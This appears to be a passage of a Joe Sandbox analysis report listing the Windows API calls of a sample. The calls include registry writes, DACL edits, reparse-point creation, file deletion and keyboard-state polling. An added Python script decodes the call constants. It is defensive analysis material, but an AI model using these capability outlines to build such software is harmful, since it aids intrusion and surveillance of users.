                                                              • _wcscmp.LIBCMT ref: 0049F08B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049F09D
                                                              • SetCurrentDirectoryW.KERNEL32(004E8920), ref: 0049F0BB
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049F0C5
                                                              • FindClose.KERNEL32(00000000), ref: 0049F0D2
                                                              • FindClose.KERNEL32(00000000), ref: 0049F0E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 66e7f0b8d03d9ceecbf75e4169a862901d6d7e1fdf9c709e4204e98b26e4afe0
                                                              • Instruction ID: 000033135e91a07f656ebc176bb70a4b16c55612824b9d587c55e47dd7f40b42
                                                              • Opcode Fuzzy Hash: 66e7f0b8d03d9ceecbf75e4169a862901d6d7e1fdf9c709e4204e98b26e4afe0
                                                              • Instruction Fuzzy Hash: 2B31B6325012187BDF14DFB5DC49AEE7BAC9F44361F1401B7E808D2191DB79DA48CA6D
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B0953
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,004BF910,00000000,?,00000000,?,?), ref: 004B09C1
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004B0A09
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004B0A92
                                                              • RegCloseKey.ADVAPI32(?), ref: 004B0DB2
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B0DBF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 061a417e759cabeade4d341e3af5eb3b674444f31eed9c9eff5cb81efb7b7233
                                                              • Instruction ID: 294098fa75da494182498f75a475a935017da30b0f8e8817888c274ec14a38da
                                                              • Opcode Fuzzy Hash: 061a417e759cabeade4d341e3af5eb3b674444f31eed9c9eff5cb81efb7b7233
                                                              • Instruction Fuzzy Hash: 19023A756006019FCB14EF19C881E6AB7E5FF89314F04855EF8899B3A2CB78ED05CB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0DM$0EM$0FM$3cD$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGM$_D
                                                              • API String ID: 0-1571114681
                                                              • Opcode ID: b3a137d33b79b2f9c52dfd541658b17ee0742e395a9b83b5f44c38fb91b66979
                                                              • Instruction ID: e5edff143c0eb95a7776ef4250570b911324b8d83c14ad8edf35259aa86a0faf
                                                              • Opcode Fuzzy Hash: b3a137d33b79b2f9c52dfd541658b17ee0742e395a9b83b5f44c38fb91b66979
                                                              • Instruction Fuzzy Hash: 1E726E71E002199BEB14DF59C8807AEB7B5FF45310F15856BE805EB390EB389D82CB99
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0049F113
                                                              • _wcscmp.LIBCMT ref: 0049F128
                                                              • _wcscmp.LIBCMT ref: 0049F13F
                                                                • Part of subcall function 00494385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004943A0
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0049F16E
                                                              • FindClose.KERNEL32(00000000), ref: 0049F179
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0049F195
                                                              • _wcscmp.LIBCMT ref: 0049F1BC
                                                              • _wcscmp.LIBCMT ref: 0049F1D3
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049F1E5
                                                              • SetCurrentDirectoryW.KERNEL32(004E8920), ref: 0049F203
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049F20D
                                                              • FindClose.KERNEL32(00000000), ref: 0049F21A
                                                              • FindClose.KERNEL32(00000000), ref: 0049F22C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: d9249ecfc69c45f0c05a9f2a60316c27c00115dc9fd2b0bc45c0acc215c84476
                                                              • Instruction ID: ba9c007c816659bfc46bcd19759bc65eee93c6139fb43a74b270a1515cd245ef
                                                              • Opcode Fuzzy Hash: d9249ecfc69c45f0c05a9f2a60316c27c00115dc9fd2b0bc45c0acc215c84476
                                                              • Instruction Fuzzy Hash: 5C31B3365002196ACF149FA4EC49FEF7BAC9F45365F1402B7E804E2191DB39DE49CA6C
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0049A20F
                                                              • __swprintf.LIBCMT ref: 0049A231
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0049A26E
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0049A293
                                                              • _memset.LIBCMT ref: 0049A2B2
                                                              • _wcsncpy.LIBCMT ref: 0049A2EE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0049A323
                                                              • CloseHandle.KERNEL32(00000000), ref: 0049A32E
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0049A337
                                                              • CloseHandle.KERNEL32(00000000), ref: 0049A341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 6016f68e01b5cee441d9c412756b2cbdbe2587a46b5c2551fa48f23c9d954178
                                                              • Instruction ID: 5549b965648e90950d339df0cdb5aba3fd9795ceca1536459429353174174be9
                                                              • Opcode Fuzzy Hash: 6016f68e01b5cee441d9c412756b2cbdbe2587a46b5c2551fa48f23c9d954178
                                                              • Instruction Fuzzy Hash: CA31D371500109ABDF209FA0DC49FEB37BCEF88705F1041B7F908D2160EB7496588B69
                                                              APIs
                                                                • Part of subcall function 00488202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0048821E
                                                                • Part of subcall function 00488202: GetLastError.KERNEL32(?,00487CE2,?,?,?), ref: 00488228
                                                                • Part of subcall function 00488202: GetProcessHeap.KERNEL32(00000008,?,?,00487CE2,?,?,?), ref: 00488237
                                                                • Part of subcall function 00488202: HeapAlloc.KERNEL32(00000000,?,00487CE2,?,?,?), ref: 0048823E
                                                                • Part of subcall function 00488202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00488255
                                                                • Part of subcall function 0048829F: GetProcessHeap.KERNEL32(00000008,00487CF8,00000000,00000000,?,00487CF8,?), ref: 004882AB
                                                                • Part of subcall function 0048829F: HeapAlloc.KERNEL32(00000000,?,00487CF8,?), ref: 004882B2
                                                                • Part of subcall function 0048829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00487CF8,?), ref: 004882C3
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00487D13
                                                              • _memset.LIBCMT ref: 00487D28
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00487D47
                                                              • GetLengthSid.ADVAPI32(?), ref: 00487D58
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00487D95
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00487DB1
                                                              • GetLengthSid.ADVAPI32(?), ref: 00487DCE
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00487DDD
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00487DE4
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00487E05
                                                              • CopySid.ADVAPI32(00000000), ref: 00487E0C
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00487E3D
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00487E63
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00487E77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 0502a81dffc18e98c0adeabee1379fad7a9809ef054bee0983258d92ec854b99
                                                              • Instruction ID: 56a82255ce6d1d872a70e94513c66d0a001791bc23a54d251012886be3e30311
                                                              • Opcode Fuzzy Hash: 0502a81dffc18e98c0adeabee1379fad7a9809ef054bee0983258d92ec854b99
                                                              • Instruction Fuzzy Hash: F3616D71904109AFCF00EFA5DC54AEEBB79FF08304F14866AE819A6291DB39DE05DB64
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00490097
                                                              • SetKeyboardState.USER32(?), ref: 00490102
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00490122
                                                              • GetKeyState.USER32(000000A0), ref: 00490139
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00490168
                                                              • GetKeyState.USER32(000000A1), ref: 00490179
                                                              • GetAsyncKeyState.USER32(00000011), ref: 004901A5
                                                              • GetKeyState.USER32(00000011), ref: 004901B3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 004901DC
                                                              • GetKeyState.USER32(00000012), ref: 004901EA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00490213
                                                              • GetKeyState.USER32(0000005B), ref: 00490221
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: cde87b604a4dd2e5e85d404541b9ddf5617a88b2f0e77a08a388dbcf99159fb4
                                                              • Instruction ID: f5e10f8d964fcf16dc805f551ea1e9fedecf348f7e314918ffce1e5ea29b8883
                                                              • Opcode Fuzzy Hash: cde87b604a4dd2e5e85d404541b9ddf5617a88b2f0e77a08a388dbcf99159fb4
                                                              • Instruction Fuzzy Hash: E451DB209047882DFF35DBA098557ABBFB49F01380F0845BF99C5562C3DA6C9B8CC769
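The argument values in the three function blocks above (the CreateFileW/DeviceIoControl block, the DACL block and the keyboard-state block) are printed as raw hexadecimal, and decoding them is the first thing to do with a listing like this. The following script is an added example for reading the report; it is neither Joe Sandbox code nor code recovered from the sample. It parses lines in the shape of the "APIs" entries and looks the constants up in tables taken from the Windows SDK headers: 0x000900A4 in the DeviceIoControl call splits into device type 9 (FILE_DEVICE_FILE_SYSTEM), function 41, METHOD_BUFFERED, which is FSCTL_SET_REPARSE_POINT; the CreateFileW call before it uses GENERIC_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT; GetUserObjectSecurity is called with DACL_SECURITY_INFORMATION (4); and the keys polled in the keyboard block are VK_LSHIFT (A0), VK_RSHIFT (A1), VK_CONTROL (11), VK_MENU (12) and VK_LWIN (5B). The sample lines embedded in the script are copied from the entries above; the regular expression assumes the bare-hex, `?`-for-unknown argument form of this listing and skips entries that have no argument list (the LIBCMT ones).

```python
"""Decode the numeric arguments in Joe Sandbox 'APIs' lines.

Added example for reading this report; not Joe Sandbox code and not code from
the analysed sample.  Assumptions: arguments are bare hexadecimal (no 0x
prefix), unknown values are '?', and an optional ', ref: <addr>' suffix
follows the call, as in the listing above.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Sample input copied from the function blocks above (constructed test data).
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0049A293",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0049A323",
    "• GetAsyncKeyState.USER32(000000A0), ref: 00490122",
    "• Part of subcall function 00488202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0048821E",
    "• __swprintf.LIBCMT ref: 0049A231",  # no argument list: skipped by the parser
]

API_RE = re.compile(
    r"^\W*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)"
    r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # int for hex values, None for '?', str otherwise (e.g. "*.*")
    ref: Optional[str]

def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one 'APIs' entry; returns None for entries without an argument list."""
    m = API_RE.match(line)
    if not m:
        return None
    args = []
    for raw in (m["args"].split(",") if m["args"].strip() else []):
        raw = raw.strip()
        if raw == "?":
            args.append(None)
            continue
        try:
            args.append(int(raw, 16))
        except ValueError:       # non-numeric argument such as a string literal
            args.append(raw)
    return ApiCall(m["name"], m["module"], args, m["ref"])

# Constant tables (values from the Windows SDK headers).
GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"), (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
              (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x40000000, "FILE_FLAG_OVERLAPPED")]
SECURITY_INFO = [(0x1, "OWNER_SECURITY_INFORMATION"), (0x2, "GROUP_SECURITY_INFORMATION"),
                 (0x4, "DACL_SECURITY_INFORMATION"), (0x8, "SACL_SECURITY_INFORMATION")]
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
KNOWN_FSCTL = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}

def flag_names(value: int, table) -> list:
    """Expand a bit mask into symbolic names; leftover bits are reported as hex."""
    names, rest = [], value
    for bit, name in table:
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return names

def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE: DeviceType bits 16-31, Access 14-15, Function 2-13, Method 0-1."""
    return {"device": code >> 16, "access": ACCESS[(code >> 14) & 3],
            "function": (code >> 2) & 0xFFF, "method": METHODS[code & 3],
            "name": KNOWN_FSCTL.get(code)}

def annotate(call: ApiCall) -> dict:
    """Map parameter names to meanings for the arguments this example can decode."""
    a, notes = call.args, {}
    def known(i):            # argument present and numeric (not '?' or a string)
        return i < len(a) and isinstance(a[i], int)
    if call.name in ("CreateFileW", "CreateFileA"):
        if known(1): notes["dwDesiredAccess"] = flag_names(a[1], GENERIC_ACCESS)
        if known(4): notes["dwCreationDisposition"] = DISPOSITION.get(a[4], hex(a[4]))
        if known(5): notes["dwFlagsAndAttributes"] = flag_names(a[5], FILE_FLAGS)
    elif call.name == "DeviceIoControl" and known(1):
        notes["dwIoControlCode"] = decode_ioctl(a[1])
    elif call.name in ("GetAsyncKeyState", "GetKeyState") and known(0):
        notes["vKey"] = VK.get(a[0], hex(a[0]))
    elif call.name in ("GetUserObjectSecurity", "SetUserObjectSecurity") and known(1):
        notes["SECURITY_INFORMATION"] = flag_names(a[1], SECURITY_INFO)
    return notes

def annotate_lines(lines) -> list:
    """Parse and annotate every entry; entries without an argument list are dropped."""
    calls = (parse_api_line(line) for line in lines)
    return [(c.name, c.ref, annotate(c)) for c in calls if c is not None]

if __name__ == "__main__":
    for name, ref, notes in annotate_lines(SAMPLE_LINES):
        print(f"{name} @ {ref}: {notes}")
```

The tables cover only the constants that appear in the blocks above; extend KNOWN_FSCTL, VK and the flag lists as further report sections need them, and keep the decoded CTL_CODE fields (device, function, method) even for codes not in the table, since they identify the target driver class on their own.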
                                                              APIs
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B04AC
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004B054B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004B05E3
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004B0822
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B082F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: 6b15dfe68101992733c19245efe1c5cb2453752f8f83510bb3aad2bd2b3f2630
                                                              • Instruction ID: e9ed6caee20d3461d73c1e2029923fcbe79807e1c9cf5e88925a033de703b3e6
                                                              • Opcode Fuzzy Hash: 6b15dfe68101992733c19245efe1c5cb2453752f8f83510bb3aad2bd2b3f2630
                                                              • Instruction Fuzzy Hash: 03E15071604200AFCB14EF69C891D6BBBE4FF89314F04856EF84AD7261DA34ED05CB95
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: e9abb02fe7443fe329f85096add3914f233c7ba36f4e2cd6aad2428a89efe679
                                                              • Instruction ID: e1cff0963d6d4053f2deed1d8f113d55fb679fe32f9a1af3060dee3ac7e4137e
                                                              • Opcode Fuzzy Hash: e9abb02fe7443fe329f85096add3914f233c7ba36f4e2cd6aad2428a89efe679
                                                              • Instruction Fuzzy Hash: 4B21B1352002109FDB04AF24EC09B6E7BA8EF95351F00816BF949DB2A1DBB8AC05CB5D
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004938A3
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0049394B
                                                              • MoveFileW.KERNEL32(?,?), ref: 0049395E
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0049397B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049399D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004939B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: d647dd287c046929ae3c25e935f2d9355ff1a4938a8c48ab99658eea5ec9c262
                                                              • Instruction ID: 121ae9363c0d416af3ad57c2f6113fe48baf4d147289b70f0a05eebffe9199ea
                                                              • Opcode Fuzzy Hash: d647dd287c046929ae3c25e935f2d9355ff1a4938a8c48ab99658eea5ec9c262
                                                              • Instruction Fuzzy Hash: C951B2B180014C9ACF15EFA1C9929FEBB78AF15315F6001BEE44677191EB396F09CB68
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0049F440
                                                              • Sleep.KERNEL32(0000000A), ref: 0049F470
                                                              • _wcscmp.LIBCMT ref: 0049F484
                                                              • _wcscmp.LIBCMT ref: 0049F49F
                                                              • FindNextFileW.KERNEL32(?,?), ref: 0049F53D
                                                              • FindClose.KERNEL32(00000000), ref: 0049F553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                              • String ID: *.*
                                                              • API String ID: 713712311-438819550
                                                              • Opcode ID: 22583bdf8c58cafa443640074d61deeb6e8413646a2a7aa3cf40e2858c58e463
                                                              • Instruction ID: c95a9b0225f00efbc07427010ac1d89e9f94a24d1ad8da4bdc78c68bd636d153
                                                              • Opcode Fuzzy Hash: 22583bdf8c58cafa443640074d61deeb6e8413646a2a7aa3cf40e2858c58e463
